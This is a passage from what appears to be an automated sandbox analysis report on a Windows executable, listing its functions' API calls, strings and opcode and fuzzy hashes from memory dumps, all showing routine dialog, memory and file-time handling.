                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1d25a7c413b64cc1c4dee81fed1a27e24b1c019bc61537549567cd7e8aefb3c1
                • Instruction ID: 38e07677170150ea38fee9f452a7878a2c60000531cbcc32ea7cd078eb19f36d
                • Opcode Fuzzy Hash: 1d25a7c413b64cc1c4dee81fed1a27e24b1c019bc61537549567cd7e8aefb3c1
                • Instruction Fuzzy Hash: 15515CB0600A8C57EB38E9A88855BBF77D99B53384F280719EB83D7282D715DD42C392
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c03cc89a8b863c62c99bef837b1633e4296ae2e080d2fb8b7509d3b8e3cffc16
                • Instruction ID: e6356d1913e970c2c1b40317580017b795ae0085b339735d2b8791e59aad8ab8
                • Opcode Fuzzy Hash: c03cc89a8b863c62c99bef837b1633e4296ae2e080d2fb8b7509d3b8e3cffc16
                • Instruction Fuzzy Hash: 8681718121D6E8AEC7065F7D38E82F93FA25773341B1980EAD4C986263C976465CD722
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d7744a181c4c2259911c1ba59fd468d154fc8ea92dc61fcdf961bfc00edde62e
                • Instruction ID: 89c5ae75942f760172b49004865ec9ae4b2099f24cbcabe5d3905dc544c099d2
                • Opcode Fuzzy Hash: d7744a181c4c2259911c1ba59fd468d154fc8ea92dc61fcdf961bfc00edde62e
                • Instruction Fuzzy Hash: A851E1305093D24FC712EF24919046EBFE0BEEA319F59499FE4D94B312D320D64ACB92
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f621259fcfaf74df7f848b7bc33a482ca9471749c82fa40e4b1a9a2500fd2a2a
                • Instruction ID: f9319cb562df238720af280ca725092e2275c9bd8e95ad228eff004468a30e62
                • Opcode Fuzzy Hash: f621259fcfaf74df7f848b7bc33a482ca9471749c82fa40e4b1a9a2500fd2a2a
                • Instruction Fuzzy Hash: 87514671A083128BC748CF19D49055AF7E1FF88354F058A2EE889A7740DB34EA59CB96
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
                • Instruction ID: 51899c0a3960b7780ed6efaa8e4c88bbd4dd5469e3b5a62673db27fec222bfc3
                • Opcode Fuzzy Hash: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
                • Instruction Fuzzy Hash: 8931E5B1A04B468FCB14DF29C85166EBBE0FB95300F50492EE595C7342C735EA49CB91
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b9605d2b0be62a5cfbb324b4ceb45b9348cef60c798755b2dd4a0d7af46c2710
                • Instruction ID: b11342d6a007b113ceef008b1cd01684cb518f4a3a72911619aadbe5afcd1293
                • Opcode Fuzzy Hash: b9605d2b0be62a5cfbb324b4ceb45b9348cef60c798755b2dd4a0d7af46c2710
                • Instruction Fuzzy Hash: BF21DA32A202654BCB58CF2DECD447777A2A786311746812BFE46CB3D1C635E965C7A0
                APIs
                • _swprintf.LIBCMT ref: 001DDABE
                  • Part of subcall function 001D400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001D401D
                  • Part of subcall function 001E1596: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00210EE8,00000200,001DD202,00000000,?,00000050,00210EE8), ref: 001E15B3
                • _strlen.LIBCMT ref: 001DDADF
                • SetDlgItemTextW.USER32(?,0020E154,?), ref: 001DDB3F
                • GetWindowRect.USER32(?,?), ref: 001DDB79
                • GetClientRect.USER32(?,?), ref: 001DDB85
                • GetWindowLongW.USER32(?,000000F0), ref: 001DDC25
                • GetWindowRect.USER32(?,?), ref: 001DDC52
                • SetWindowTextW.USER32(?,?), ref: 001DDC95
                • GetSystemMetrics.USER32(00000008), ref: 001DDC9D
                • GetWindow.USER32(?,00000005), ref: 001DDCA8
                • GetWindowRect.USER32(00000000,?), ref: 001DDCD5
                • GetWindow.USER32(00000000,00000002), ref: 001DDD47
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                • String ID: $%s:$CAPTION$T $d
                • API String ID: 2407758923-4271251702
                • Opcode ID: 4358816679430dcde0bf3c5d5b98d7956121fafe639501a923182257559adbfe
                • Instruction ID: 0208073291d2fff3007a9ad050a6f119fabdfba7f8d5cc87fa65f3753073201c
                • Opcode Fuzzy Hash: 4358816679430dcde0bf3c5d5b98d7956121fafe639501a923182257559adbfe
                • Instruction Fuzzy Hash: 9A818371204345AFD710DFA8DD89F6BBBE9EB89704F05091EFA8893291D770E909CB52
                APIs
                • ___free_lconv_mon.LIBCMT ref: 001FC277
                  • Part of subcall function 001FBE12: _free.LIBCMT ref: 001FBE2F
                  • Part of subcall function 001FBE12: _free.LIBCMT ref: 001FBE41
                  • Part of subcall function 001FBE12: _free.LIBCMT ref: 001FBE53
                  • Part of subcall function 001FBE12: _free.LIBCMT ref: 001FBE65
                  • Part of subcall function 001FBE12: _free.LIBCMT ref: 001FBE77
                  • Part of subcall function 001FBE12: _free.LIBCMT ref: 001FBE89
                  • Part of subcall function 001FBE12: _free.LIBCMT ref: 001FBE9B
                  • Part of subcall function 001FBE12: _free.LIBCMT ref: 001FBEAD
                  • Part of subcall function 001FBE12: _free.LIBCMT ref: 001FBEBF
                  • Part of subcall function 001FBE12: _free.LIBCMT ref: 001FBED1
                  • Part of subcall function 001FBE12: _free.LIBCMT ref: 001FBEE3
                  • Part of subcall function 001FBE12: _free.LIBCMT ref: 001FBEF5
                  • Part of subcall function 001FBE12: _free.LIBCMT ref: 001FBF07
                • _free.LIBCMT ref: 001FC26C
                  • Part of subcall function 001F84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,001FBFA7,?,00000000,?,00000000,?,001FBFCE,?,00000007,?,?,001FC3CB,?), ref: 001F84F4
                  • Part of subcall function 001F84DE: GetLastError.KERNEL32(?,?,001FBFA7,?,00000000,?,00000000,?,001FBFCE,?,00000007,?,?,001FC3CB,?,?), ref: 001F8506
                • _free.LIBCMT ref: 001FC28E
                • _free.LIBCMT ref: 001FC2A3
                • _free.LIBCMT ref: 001FC2AE
                • _free.LIBCMT ref: 001FC2D0
                • _free.LIBCMT ref: 001FC2E3
                • _free.LIBCMT ref: 001FC2F1
                • _free.LIBCMT ref: 001FC2FC
                • _free.LIBCMT ref: 001FC334
                • _free.LIBCMT ref: 001FC33B
                • _free.LIBCMT ref: 001FC358
                • _free.LIBCMT ref: 001FC370
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                • String ID: P
                • API String ID: 161543041-3559530664
                • Opcode ID: d63a5ad2f6271c17fc41d24fdc91877de902d79c0e85f96e216c650fa179e6f7
                • Instruction ID: b7573730485cb51448fe5521c1eca158d32b7fedd7ec936068045ff02c56c884
                • Opcode Fuzzy Hash: d63a5ad2f6271c17fc41d24fdc91877de902d79c0e85f96e216c650fa179e6f7
                • Instruction Fuzzy Hash: FD317E3260020E9FEB20AE78DA45B7AB3E9FF10350F148829E649D7551DF31AC80EB90
                APIs
                • GetWindow.USER32(?,00000005), ref: 001ECD51
                • GetClassNameW.USER32(00000000,?,00000800), ref: 001ECD7D
                  • Part of subcall function 001E17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,001DBB05,00000000,.exe,?,?,00000800,?,?,001E85DF,?), ref: 001E17C2
                • GetWindowLongW.USER32(00000000,000000F0), ref: 001ECD99
                • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 001ECDB0
                • GetObjectW.GDI32(00000000,00000018,?), ref: 001ECDC4
                • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 001ECDED
                • DeleteObject.GDI32(00000000), ref: 001ECDF4
                • GetWindow.USER32(00000000,00000002), ref: 001ECDFD
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                • String ID: STATIC
                • API String ID: 3820355801-1882779555
                • Opcode ID: de3e307cb49297d65a97a0830a24fc2be6ae734ab1850fdbb0b02c6ce2c1993e
                • Instruction ID: d06c183646216e91367e09c5c4ce714f4e1bafa1bf54910874a8ed7b2c9e70b2
                • Opcode Fuzzy Hash: de3e307cb49297d65a97a0830a24fc2be6ae734ab1850fdbb0b02c6ce2c1993e
                • Instruction Fuzzy Hash: 4E110A72540BA1FBE721ABA1AC0DFDF3A9CFF65741F004420FB46A10D2CB648D1A86E4
                APIs
                • _free.LIBCMT ref: 001F8EC5
                  • Part of subcall function 001F84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,001FBFA7,?,00000000,?,00000000,?,001FBFCE,?,00000007,?,?,001FC3CB,?), ref: 001F84F4
                  • Part of subcall function 001F84DE: GetLastError.KERNEL32(?,?,001FBFA7,?,00000000,?,00000000,?,001FBFCE,?,00000007,?,?,001FC3CB,?,?), ref: 001F8506
                • _free.LIBCMT ref: 001F8ED1
                • _free.LIBCMT ref: 001F8EDC
                • _free.LIBCMT ref: 001F8EE7
                • _free.LIBCMT ref: 001F8EF2
                • _free.LIBCMT ref: 001F8EFD
                • _free.LIBCMT ref: 001F8F08
                • _free.LIBCMT ref: 001F8F13
                • _free.LIBCMT ref: 001F8F1E
                • _free.LIBCMT ref: 001F8F2C
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: 8124b17e308af2eb3d29e89e889ba4c617c4a46860019de7d008dae80d4103f8
                • Instruction ID: c0a43397e9626d54204d0936974024306ca867b52c76a725585acea05e187222
                • Opcode Fuzzy Hash: 8124b17e308af2eb3d29e89e889ba4c617c4a46860019de7d008dae80d4103f8
                • Instruction Fuzzy Hash: E111A27651010DAFCB11EF94C852DEA3BA5FF14350B5180A5BA088B666DB31EA51DB80
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID:
                • String ID: ;%u$x%u$xc%u
                • API String ID: 0-2277559157
                • Opcode ID: 5455aa6479b0a9f8e8f281ab25fd9c8fd5ef739a943fb1079724e360ee54b4f8
                • Instruction ID: 33fe39bd33c608f2ab45cd7cd69bf5d984cef7cfcc9a14e8c283cdc7f3413a03
                • Opcode Fuzzy Hash: 5455aa6479b0a9f8e8f281ab25fd9c8fd5ef739a943fb1079724e360ee54b4f8
                • Instruction Fuzzy Hash: 2DF1F5716043415BDB25DF288895BFE779A6FB4300F08496BF8958B383DB74D944C7A2
                APIs
                  • Part of subcall function 001D130B: GetDlgItem.USER32(00000000,00003021), ref: 001D134F
                  • Part of subcall function 001D130B: SetWindowTextW.USER32(00000000,002035B4), ref: 001D1365
                • EndDialog.USER32(?,00000001), ref: 001EAD20
                • SendMessageW.USER32(?,00000080,00000001,?), ref: 001EAD47
                • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 001EAD60
                • SetWindowTextW.USER32(?,?), ref: 001EAD71
                • GetDlgItem.USER32(?,00000065), ref: 001EAD7A
                • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 001EAD8E
                • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 001EADA4
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: MessageSend$Item$TextWindow$Dialog
                • String ID: LICENSEDLG
                • API String ID: 3214253823-2177901306
                • Opcode ID: f9ae4df6b1a36a8db272b60a5f681c0bfdfb5c651559f809500948440826f1cc
                • Instruction ID: c1be3ad056160b1f4a3557d6e325587168abc0f4cd00f427994880f705d953c1
                • Opcode Fuzzy Hash: f9ae4df6b1a36a8db272b60a5f681c0bfdfb5c651559f809500948440826f1cc
                • Instruction Fuzzy Hash: 9121F632240644BBD2255FB2FD4DF7F3B6CFF6AB56F414004F604A24A0CB626905E632
                APIs
                • __EH_prolog.LIBCMT ref: 001D9448
                • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 001D946B
                • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 001D948A
                  • Part of subcall function 001E17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,001DBB05,00000000,.exe,?,?,00000800,?,?,001E85DF,?), ref: 001E17C2
                • _swprintf.LIBCMT ref: 001D9526
                  • Part of subcall function 001D400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001D401D
                • MoveFileW.KERNEL32(?,?), ref: 001D9595
                • MoveFileW.KERNEL32(?,?), ref: 001D95D5
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
                • String ID: rtmp%d
                • API String ID: 2111052971-3303766350
                • Opcode ID: 55174b05545a3508300ebcdfd2ec995ab3c8be20625ae9647e764a3542dafdf6
                • Instruction ID: 3d423899569e5411505c04694b014a8e3ae92c7a97f128678326fae11d141709
                • Opcode Fuzzy Hash: 55174b05545a3508300ebcdfd2ec995ab3c8be20625ae9647e764a3542dafdf6
                • Instruction Fuzzy Hash: 3A411371901259B6CF20EB60DC85ADE737CAF65780F0444E7B549E3242EB74DB89CB64
                APIs
                • GlobalAlloc.KERNEL32(00000040,?), ref: 001E8F38
                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 001E8F59
                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00000000), ref: 001E8F80
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: Global$AllocByteCharCreateMultiStreamWide
                • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                • API String ID: 4094277203-4209811716
                • Opcode ID: f03ae100af254b623f6840a1df6d8aca1c5cba3d60c454ae2ec2e827d02c35f7
                • Instruction ID: 4bce6738f9b719ba519fb1a5eb1c5715b4793243ecc45f52ac3f680b01c9d288
                • Opcode Fuzzy Hash: f03ae100af254b623f6840a1df6d8aca1c5cba3d60c454ae2ec2e827d02c35f7
                • Instruction Fuzzy Hash: 49319B715087457BD724BB35AC06FBFB7ACEFA2720F040109FA05A61D2EF609A0983A1
                APIs
                • GetLastError.KERNEL32(?,00210EE8,001F3E14,00210EE8,?,?,001F3713,00000050,?,00210EE8,00000200), ref: 001F8FA9
                • _free.LIBCMT ref: 001F8FDC
                • _free.LIBCMT ref: 001F9004
                • SetLastError.KERNEL32(00000000,?,00210EE8,00000200), ref: 001F9011
                • SetLastError.KERNEL32(00000000,?,00210EE8,00000200), ref: 001F901D
                • _abort.LIBCMT ref: 001F9023
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: ErrorLast$_free$_abort
                • String ID: X
                • API String ID: 3160817290-3831130985
                • Opcode ID: 0d994af9c2f7229baf2523a5db8fa1bb9b7fa18eeeeca753991e437adb0bc2df
                • Instruction ID: 2101590d89c86a0d80dbd65c8b797f40f1233c60762c64b4130a5869d207de2f
                • Opcode Fuzzy Hash: 0d994af9c2f7229baf2523a5db8fa1bb9b7fa18eeeeca753991e437adb0bc2df
                • Instruction Fuzzy Hash: A6F0FF76505B096BC62273287C0EB3B2A2E9FE1770F260118F718E22A3EF3089425424
                APIs
                • __aulldiv.LIBCMT ref: 001E0A9D
                  • Part of subcall function 001DACF5: GetVersionExW.KERNEL32(?), ref: 001DAD1A
                • FileTimeToLocalFileTime.KERNEL32(?,00000001,00000000,?,00000064,00000000,00000001,00000000,?), ref: 001E0AC0
                • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,00000001,00000000,?), ref: 001E0AD2
                • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 001E0AE3
                • SystemTimeToFileTime.KERNEL32(?,?), ref: 001E0AF3
                • SystemTimeToFileTime.KERNEL32(?,?), ref: 001E0B03
                • FileTimeToSystemTime.KERNEL32(?,?), ref: 001E0B3D
                • __aullrem.LIBCMT ref: 001E0BCB
                Memory Dump Source
                • Source File: 00000000.00000002.1680205141.00000000001D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                • Associated: 00000000.00000002.1680188372.00000000001D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680231754.0000000000203000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.000000000020E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000214000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680252607.0000000000231000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1680307021.0000000000232000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_1d0000_c62q1qZ8kX.jbxd
                Similarity
                • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                • String ID:
                • API String ID: 1247370737-0
                • Opcode ID: 3b897f2c4ea7d772328124bc5afcdb4cdaa081d19ce423df7be17141a96c4ac9
